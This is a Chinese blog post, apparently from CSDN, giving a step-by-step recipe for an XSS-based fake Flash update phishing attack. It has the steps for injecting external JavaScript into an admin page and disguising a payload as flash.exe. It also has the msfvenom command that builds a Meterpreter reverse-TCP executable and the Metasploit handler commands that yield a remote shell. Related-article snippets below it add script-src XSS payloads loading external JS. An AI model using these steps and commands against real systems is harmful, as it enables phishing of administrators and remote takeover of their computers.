xss-flash攻击钓鱼

最新推荐文章于 2025-04-29 14:17:49 发布
最新推荐文章于 2025-04-29 14:17:49 发布
阅读量392 收藏 5
点赞数 3
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/146050314
版权

1、在网站https://xssaq.com注册账号,并登录

2、在公共模块复制flash弹窗钓鱼的代码

3、在www下新建一个js文件,把代码复制进去

4、找到网站的xss漏洞,让管理员的页面引用我们的外部js文件

5、管理员页面执行了我们的代码

6、管理员一旦点击了立即升级,就进入了我们的圈套,我们想让他下载什么他就下载的是什么,下载东西的地方在我们的js文件里

7、为了管理员不容易发现我们的行为,我们把文件地址和文件名改为flash.exe,并在放js文件的地方新建一个flash.exe文件

8、此时当管理员点击立即升级时下载的就是我们的文件

当管理员下载这个文件后我们就可以控制它的电脑了,但是现在这个文件里还没有病毒,所以我们要制作病毒

9、打开kali制作病毒

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.19.133 LPORT=4444 -f exe > shell.exe
如果提示未找到命令的话那就以此输入这两条命令,回车 
apt-get update
sudo apt-get install metasploit-framework

然后再输入病毒命令就可以了,这样我们可以看到在root里生成了一个shell.exe文件

10、把这个病毒文件拖到我们的网站上,并把病毒的名字改为flash的名字

11、此时,这个病毒就可以使用了,我们在kali里对自己的病毒进行监听,在kali里一条一条的运行下面的语句

msfconsole    //打开控制台
use exploit/multi/handler   //使用监听模块
set payload windows/x64/meterpreter/reverse_tcp    //使用Windows64的监听
set lhost kali的ip    //监听的地址
set lport 4444    //监听的端口
run   //运行
现在就是正在监听的状态

12、模拟管理员点击立即升级,下载我们的病毒

13、在kali里输入shell就可以执行命令了

14、比如,我们要打开它的计算器

当我输入calc时,这台计算机的计算器就被打开了
WEB 攻防-通用漏-XSS 跨站脚本攻击-反射型/存储型/DOM&BEEF-XSS
weixin_45534587的博客
01-12 1266
XSS攻击,全称为跨站脚本攻击,是指攻击者通过在网页中插入恶意脚本代码,当用户浏览该网页时,恶意脚本会被执行,从而达到攻击目的的一种安全漏洞。这些恶意脚本可以窃取用户的敏感信息,如Cookie、会话令牌等,或者诱导用户执行不安全的操作,如点击恶意链接、下载恶意软件等。
Web安全--XSS跨站脚本攻击
weixin_68243135的博客
11-28 796
Web安全,xss攻击利用,以及绕过和防护措施。
XMind 2020 XSS漏洞复现
遇事不决冲冲冲
05-25 2343
一.前言 漏洞危害:可以花样构造相关参数,执行系统命令,获取用户权限,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害,我看网上相关复现文章都贴着这句话,其实也就是这样的,XMind xss漏洞的确可以被利用执行一些像弹窗,执行命令(经典ipconfig命令,弹计算器),以及配合cs的使用,如果真的有有心人去利用这个漏洞的话,也是很容易中招的。下面放上下载地址。 下载地址下载XMind 2020版本 二.漏洞利用 1.xss弹窗 创建 写入命令 在思维导图红色部分(不止红
利用xss进行flash攻击钓鱼
ljh123321ljh的博客
03-09 185
3.将pika的管理员作为被攻击者,在输入框中输入<script src="http://192.168.1.11/1.js"></script>,并提交。5.修改1.js中控制下载文件的文件名,修改为flash.exe使得管理员相信下载文件为官方flash文件。4.在管理员界面会出现如下弹窗,提示管理员下载我们制造好的flash。2.将代码粘贴到js文件中并放到数据库根目录下。6.在根目录下创建flash.exe文件。7.现在我们到kali虚拟机中制造病毒。9.管理员下载了我们所制造的病毒。
我是如何从一个xss到某个浏览器的远程命令执行
weixin_30736301的博客
03-24 521
0x01 前言:其实我是个小白平时就喜欢瞎搞,无意间碰到一个浏览器就想一探究竟,好了废话不多说开始!!! 0x02 可以看到我打开的新标签是怎么一个链接页面,既然是页面我是不可以XSS它呢? 于是我就打开了控制器输入XSS代码如下图: 输入payload发现能成功弹窗,我们来假设如果这个浏览器的本地域既然能弹XSS是不可以弹出其他的呢? 没错确实能弹出其...
[代码审计]青云客Cms前台有条件注入至getshell,后台xss至getshell、至弹你一脸计算器...
weixin_30791095的博客
12-15 301
之前写了一篇关于青云客cms的文章,发在了t00ls,就不copy过来了。 给个链接,好记录一下。 https://www.t00ls.net/thread-43093-1-1.html 转载于:https://www.cnblogs.com/r00tuser/p/8044025.html...
XSS攻击常识及常见的XSS攻击脚本汇总
撸小鱼&奥术猫
04-12 4137
一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。 二、XSS分类 XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS 1、反射型XSS 发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内...
XSS -攻击防御手册.pdf
07-26
#### 七、进行Flash攻击 尽管HTML5已逐渐取代Flash,但在Flash仍然被广泛使用的时期,攻击者可以通过创建恶意的Flash对象来触发XSS攻击。这通常涉及到利用Flash的脚本接口,使浏览器执行不受信任的代码。 #### 八...
XSS跨站脚本攻击剖析与防御.pdf
05-16
第2章 XSS利用方式,就当前比较流行的XSS利用方式做了深入的剖析,这些攻击往往基于客户端,从挂马、窃取Cookies、会话劫持到钓鱼欺骗,各种攻击都不容忽视。第3章 XSS测试和利用工具,介绍了一些常见的XSS测试工具...
XSS跨站脚本攻击剖析与防御
04-28
第2章 XSS利用方式,就当前比较流行的XSS利用方式做了深入的剖析,这些攻击往往基于客户端,从挂马、窃取Cookies、会话劫持到钓鱼欺骗,各种攻击都不容忽视。第3章 XSS测试和利用工具,介绍了一些常见的XSS测试工具...
戏耍XSS的一些技巧
匆匆那年的专栏
08-17 309
戏耍XSS的一些技巧 Black-Hole2015-08-07共519433人围观 ,发现 26 个不明物体WEB安全   这不是08年的时候了,现在是2015年。那时候天还是蓝的,水还是绿的。食物是可以吃的,河里的水是可以直接喝的。孩子也是自己的。 Webkit渲染txt还是带XSS的。但是7年过去了,改变了太多,但是无论系统如何升级,只要有一个猥琐的思路就行了。今天说的是说XSS的一...
栈溢出攻击之弹出计算器
Bonjour~
04-15 7899
一.系统栈溢出原理函数栈帧及寄存器在高级语言中,当函数被调用时,系统栈会为这个函数开辟一个新的栈帧,并把它压入栈中。这个栈帧中的内存空间被它所属的函数独占,正常情况下是不会和别的函数共享的。当函数返回时,系统栈会弹出该函数所对应的栈帧。Win32系统提供两个特殊的寄存器用于标识位于系统栈顶端的栈帧: 1. ESP:栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的栈顶; 2.
xss跨站脚本***大全
weixin_34331102的博客
03-20 568
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无...
神漏洞!macOS也能弹计算器,一行JS代码远程命令执行
weixin_34294649的博客
09-20 1802
本文讲的是神漏洞!macOS也能弹计算器,一行JS代码远程命令执行,最近,Google Project Zero公开披露了一个macOS系统的神漏洞,一行JS代码便可以让Mac电脑弹计算器。 这个神漏洞真的特别有趣,研究员发现macOS的内置应用HelpViewer有一个内部协议调用,可以打开本机上的任何文件,这个协议调用的路径检查有点缺陷,使用某些特...
一个危险的XSS案例——轻松拿到登录用户的cookie
dengrong8117的博客
06-06 1391
casperchen from IMWeb Team. 站酷是我很喜欢的设计类站点,上面有我大二美好的回忆,卖个广告,我的个人主页是:http://www.zcool.com.cn/u/346408 很好,其实上面不是重点。这段时间周围出现了好几单安全相关的问题,基本都是XSS漏洞导致的。于是内心一直惦记着,包括上个周末在逛站酷的时候,然后突发奇想:站酷上是否也存在XSS...
XSS(跨站脚本攻击)原理与案例详解
m0_68037567的博客
04-23 615
利用信任,将恶意脚本注入用户浏览器。
XSS靶场实战(工作wuwuwu)
最新发布
m0_74317362的博客
04-29 249
无聊
HTML与安全性:XSS、防御与最佳实践
欢迎来到我的博客,希望你能有所收获!
04-26 1063
XSS、防御与最佳实践
XSS攻击与防御全面指南
**第七章 – 进行Flash攻击** Flash对象也可以成为XSS攻击的载体,因为它可以包含可执行的代码,攻击者可能利用Flash漏洞来执行恶意脚本。 **第八章 – 上传XSS脚本** 某些网站允许用户上传文件,如果不加以限制,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值